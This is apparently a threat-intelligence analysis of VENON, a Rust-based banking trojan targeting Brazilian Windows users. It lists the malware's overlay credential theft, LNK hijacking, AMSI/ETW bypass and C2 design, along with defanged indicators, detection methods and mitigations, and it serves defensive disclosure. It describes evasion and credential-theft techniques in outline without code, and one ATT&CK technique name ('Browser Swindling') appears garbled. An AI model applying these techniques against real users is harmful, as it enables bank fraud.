Full Report
Cybersecurity researchers have disclosed details of a new banking malware targeting Brazilian users that's written in Rust, marking a significant departure from other known Delphi-based malware families associated with the Latin American cybercrime ecosystem. The malware, which is designed to infect Windows systems and was first discovered last month, has been codenamed VENON by Brazilian
Analysis Summary
# Tool/Technique: VENON
## Overview
VENON is a sophisticated banking Trojan written in the Rust programming language, specifically designed to target Windows users in Brazil. It represents a significant shift in the Latin American cybercrime landscape, which has traditionally relied on Delphi-based malware. The tool is designed to monitor financial activity and deploy credential-stealing overlays to compromise accounts at 33 different financial institutions and digital asset platforms.
## Technical Details
- **Type:** Malware family (Banking Trojan / RAT)
- **Platform:** Windows
- **Capabilities:** Credential theft via overlays, LNK hijacking, browser monitoring, and advanced evasion.
- **First Seen:** February 2026 (variants dating back to January 2026)
## MITRE ATT&CK Mapping
- **[TA0002 - Execution]**
- [T1204.002 - User Execution: Malicious File] (Infection via ZIP/PowerShell)
- [T1059.001 - Command and Scripting Interpreter: PowerShell]
- [T1053.005 - Scheduled Task/Job: Scheduled Task]
- **[TA0005 - Defense Evasion]**
- [T1574.002 - Hijacking Execution Flow: DLL Side-Loading]
- [T1106 - Native API] (Indirect syscalls)
- [T1562.001 - Impair Defenses: Disable or Modify Tools] (AMSI and ETW bypass)
- [T1497 - Virtualization/Sandbox Evasion]
- **[TA0003 - Persistence]**
- [T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification]
- **[TA0009 - Collection]**
- [T1185 - Browser Swindling] (Overlay injections)
## Functionality
### Core Capabilities
- **Banking Overlays:** Serves fake visual layers over legitimate banking websites/applications to capture credentials.
- **Active Window Monitoring:** Tracks the titles of active windows and browser domains to trigger overlays when one of 33 targeted banks is accessed.
- **LNK Hijacking:** Utilizes VBScript to replace legitimate application shortcuts (specifically targeting the Itaú bank app) with malicious versions.
- **C2 Communication:** Establishes a WebSocket connection for real-time command and control.
### Advanced Features
- **Sophisticated Evasion:** Implements nine distinct evasion techniques, including indirect syscalls (to bypass EDR hooks), Event Tracing for Windows (ETW) bypass, and Antimalware Scan Interface (AMSI) bypass.
- **Remote Restoration:** Includes an uninstall routine that restores original shortcuts, allowing the attacker to remove traces of infection remotely.
- **Cloud-Based Config:** Retrieves initial configuration files from Google Cloud Storage to stay flexible.
## Indicators of Compromise
- **File Hashes:** [Not specifically listed in article text; refer to ZenoX report]
- **File Names:** Frequently distributed in ZIP archives; uses malicious DLLs for side-loading.
- **Registry Keys:** Used for Scheduled Tasks persistence.
- **Network Indicators:**
- `hxxps://storage[.]googleapis[.]com/[redacted]` (Config retrieval)
- WebSocket C2 connections (specific domains not provided in text).
- **Behavioral Indicators:**
- PowerShell execution leading to ZIP downloads.
- Modification of `.LNK` files in user directories.
- Execution of VBScript blocks for shortcut manipulation.
## Associated Threat Actors
- **Unknown:** No specific attribution to documented groups, though the developer uses the username **"byst4"** in their environment paths.
## Detection Methods
- **Signature-based detection:** Scanning for the Rust-based VENON binary and associated VBScript modules.
- **Behavioral detection:**
- Monitoring for DLL side-loading events in common system processes.
- Monitoring for unauthorized modifications to `.LNK` files.
- Detecting common bypass techniques like AMSI/ETW patching in memory.
- **YARA rules:** Should focus on the specific Rust implementation of Latin American banking logic and the VBScript LNK hijacking strings.
## Mitigation Strategies
- **Prevention measures:** Block execution of unsigned scripts (PowerShell/VBScript) via policy.
- **Hardening recommendations:** Implement Attack Surface Reduction (ASR) rules to prevent office applications or browsers from spawning child processes like PowerShell.
- **Email Security:** Train users to identify "ClickFix" social engineering tactics that prompt for manual script execution.
## Related Tools/Techniques
- **Grandoreiro / Mekotio / Coyote:** Share similar banking overlay and monitoring logic.
- **ClickFix:** The social engineering framework used for initial access.
- **SORVEPOTEL:** A WhatsApp-based worm used in similar regional campaigns to deliver banking malware like Astaroth.